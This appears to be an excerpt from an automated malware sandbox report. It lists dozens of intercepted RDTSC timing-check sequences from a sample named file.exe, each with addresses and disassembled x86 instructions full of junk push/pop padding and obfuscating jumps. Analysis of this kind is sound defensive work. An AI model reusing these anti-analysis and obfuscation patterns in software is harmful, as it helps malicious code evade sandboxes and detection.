                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A95F second address: 49A9B7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F25EC6CB8F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 58FDD1FBh 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 call 00007F25EC6CB8E8h 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc eax 0x00000027 push eax 0x00000028 ret 0x00000029 pop eax 0x0000002a ret 0x0000002b call 00007F25EC6CB8E9h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 je 00007F25EC6CB8E6h 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A9B7 second address: 49A9BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A9BB second address: 49A9C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A9C1 second address: 49A9F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F25ED41A9FEh 0x00000012 jmp 00007F25ED41A9F8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A9F9 second address: 49AA3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F25EC6CB8EDh 0x00000008 jmp 00007F25EC6CB8F7h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push esi 0x00000015 push esi 0x00000016 jnc 00007F25EC6CB8E6h 0x0000001c pop esi 0x0000001d pop esi 0x0000001e mov eax, dword ptr [eax] 0x00000020 pushad 0x00000021 pushad 0x00000022 jo 00007F25EC6CB8E6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AA3D second address: 49AA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F25ED41A9F6h 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007F25ED41A9E8h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49AB52 second address: 49AB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49ABF1 second address: 49ABF7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B328 second address: 49B32E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B32E second address: 49B363 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F25ED41A9F8h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f jmp 00007F25ED41A9F2h 0x00000014 pop edi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B363 second address: 49B368 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B501 second address: 49B507 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B507 second address: 49B521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25EC6CB8F6h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B754 second address: 49B7A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F25ED41A9E8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+1248C032h] 0x0000002d mov edx, 3AACF6A2h 0x00000032 push eax 0x00000033 pushad 0x00000034 push edi 0x00000035 pushad 0x00000036 popad 0x00000037 pop edi 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B7A0 second address: 47B8AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edx, dword ptr [ebp+122D2A1Dh] 0x0000000f mov ecx, ebx 0x00000011 call dword ptr [ebp+122D35D0h] 0x00000017 push esi 0x00000018 pushad 0x00000019 jc 00007F25EC6CB8E6h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F25EC6CB8F3h 0x00000026 popad 0x00000027 pop esi 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3EEC second address: 4D3F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F1h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3F08 second address: 4D3F0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3F0C second address: 4D3F12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3F12 second address: 4D3F31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007F25EC6CB8F0h 0x0000000c popad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D3F31 second address: 4D3F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4071 second address: 4D4076 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D41CA second address: 4D41D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F25ED41A9E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4362 second address: 4D437E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F25EC6CB8E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007F25EC6CB8EEh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D437E second address: 4D4382 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4382 second address: 4D43C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25EC6CB8EFh 0x00000007 jmp 00007F25EC6CB8EEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F25EC6CB8EBh 0x00000015 jmp 00007F25EC6CB8EDh 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D43C0 second address: 4D43E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D451D second address: 4D452B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F25EC6CB8E6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D452B second address: 4D4538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F25ED41A9E6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D483A second address: 4D4841 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D4841 second address: 4D486B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F25ED41AA01h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 44E859 second address: 44E862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D85A3 second address: 4D85A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D85A7 second address: 4D85AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D86FD second address: 4D8703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8703 second address: 4D8707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA893 second address: 4DA8AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F25ED41A9E6h 0x00000009 jmp 00007F25ED41A9EDh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8AE second address: 4DA8B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8B4 second address: 4DA8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8B8 second address: 4DA8ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F25EC6CB8ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jo 00007F25EC6CB917h 0x00000013 jne 00007F25EC6CB8F7h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA8ED second address: 4DA8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DAA4F second address: 4DAA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F25EC6CB8E6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF6B4 second address: 4DF6D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F3h 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F25ED41A9E6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF6D3 second address: 4DF6F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F25EC6CB8F4h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DF996 second address: 4DF99C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFAF7 second address: 4DFB27 instructions: 0x00000000 rdtsc 0x00000002 js 00007F25EC6CB8E6h 0x00000008 jg 00007F25EC6CB8E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F25EC6CB8F1h 0x00000015 push ecx 0x00000016 jmp 00007F25EC6CB8ECh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFCC0 second address: 4DFCDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jnl 00007F25ED41A9E6h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 jng 00007F25ED41A9E6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFE79 second address: 4DFE7E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0BB second address: 49B188 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F25ED41A9F1h 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jbe 00007F25ED41AA06h 0x00000012 pushad 0x00000013 jmp 00007F25ED41A9F8h 0x00000018 jp 00007F25ED41A9E6h 0x0000001e popad 0x0000001f nop 0x00000020 mov dword ptr [ebp+122D19B6h], edx 0x00000026 mov ebx, dword ptr [ebp+1248C071h] 0x0000002c push 00000000h 0x0000002e push ebp 0x0000002f call 00007F25ED41A9E8h 0x00000034 pop ebp 0x00000035 mov dword ptr [esp+04h], ebp 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ebp 0x00000042 push ebp 0x00000043 ret 0x00000044 pop ebp 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D307Ch], esi 0x0000004c add eax, ebx 0x0000004e je 00007F25ED41A9ECh 0x00000054 mov ecx, dword ptr [ebp+122D2965h] 0x0000005a nop 0x0000005b jp 00007F25ED41A9F7h 0x00000061 push eax 0x00000062 push eax 0x00000063 jmp 00007F25ED41A9F9h 0x00000068 pop eax 0x00000069 nop 0x0000006a mov edx, 0CADFB92h 0x0000006f push 00000004h 0x00000071 jp 00007F25ED41A9ECh 0x00000077 push eax 0x00000078 push edx 0x00000079 push eax 0x0000007a push edx 0x0000007b jns 00007F25ED41A9E6h 0x00000081 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B188 second address: 49B18C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DFFCE second address: 4DFFDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F25ED41A9E6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0AE7 second address: 4E0AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0AED second address: 4E0B01 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F25ED41A9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F25ED41A9E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B01 second address: 4E0B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B05 second address: 4E0B0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B0F second address: 4E0B19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E0B19 second address: 4E0B39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F25ED41A9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E463D second address: 4E4642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E4642 second address: 4E465F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25ED41A9F9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E465F second address: 4E4663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F70 second address: 4E3F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pop ebx 0x00000008 push esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E3F7C second address: 4E3F92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 js 00007F25EC6CB8E6h 0x0000000c popad 0x0000000d pushad 0x0000000e jc 00007F25EC6CB8E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E40DC second address: 4E40E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E5C3C second address: 4E5C44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8BB5 second address: 4E8BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8BB9 second address: 4E8C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F25EC6CB8F7h 0x0000000d pushad 0x0000000e jmp 00007F25EC6CB8F5h 0x00000013 push eax 0x00000014 pop eax 0x00000015 jnc 00007F25EC6CB8E6h 0x0000001b popad 0x0000001c popad 0x0000001d push edx 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pop edx 0x00000022 pushad 0x00000023 jmp 00007F25EC6CB8F3h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8C13 second address: 4E8C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8D7C second address: 4E8D88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F25EC6CB8E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FE7 second address: 4E8FFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25ED41A9EFh 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E8FFB second address: 4E9005 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F25EC6CB8E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9005 second address: 4E9031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F25ED41A9F7h 0x00000011 pop ebx 0x00000012 jo 00007F25ED41A9F2h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9031 second address: 4E9037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4E9308 second address: 4E9324 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F25ED41A9F5h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE581 second address: 4EE5A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F25EC6CB8F7h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE5A2 second address: 4EE5A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE5A9 second address: 4EE5CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F25EC6CB8F8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE5CA second address: 4EE5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE722 second address: 4EE791 instructions: 0x00000000 rdtsc 0x00000002 js 00007F25EC6CB8E6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F25EC6CB8F5h 0x00000011 pushad 0x00000012 jnp 00007F25EC6CB8E6h 0x00000018 jmp 00007F25EC6CB8EFh 0x0000001d pushad 0x0000001e popad 0x0000001f push edi 0x00000020 pop edi 0x00000021 popad 0x00000022 popad 0x00000023 push ecx 0x00000024 pushad 0x00000025 jmp 00007F25EC6CB8F9h 0x0000002a jmp 00007F25EC6CB8F5h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE791 second address: 4EE7AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F25ED41A9EFh 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EECEE second address: 4EECF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EEFC4 second address: 4EEFCE instructions: 0x00000000 rdtsc 0x00000002 jp 00007F25ED41A9EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF520 second address: 4EF536 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F25EC6CB8F2h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF536 second address: 4EF540 instructions: 0x00000000 rdtsc 0x00000002 js 00007F25ED41A9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF540 second address: 4EF549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF549 second address: 4EF553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EFAD2 second address: 4EFAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EFAD6 second address: 4EFADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
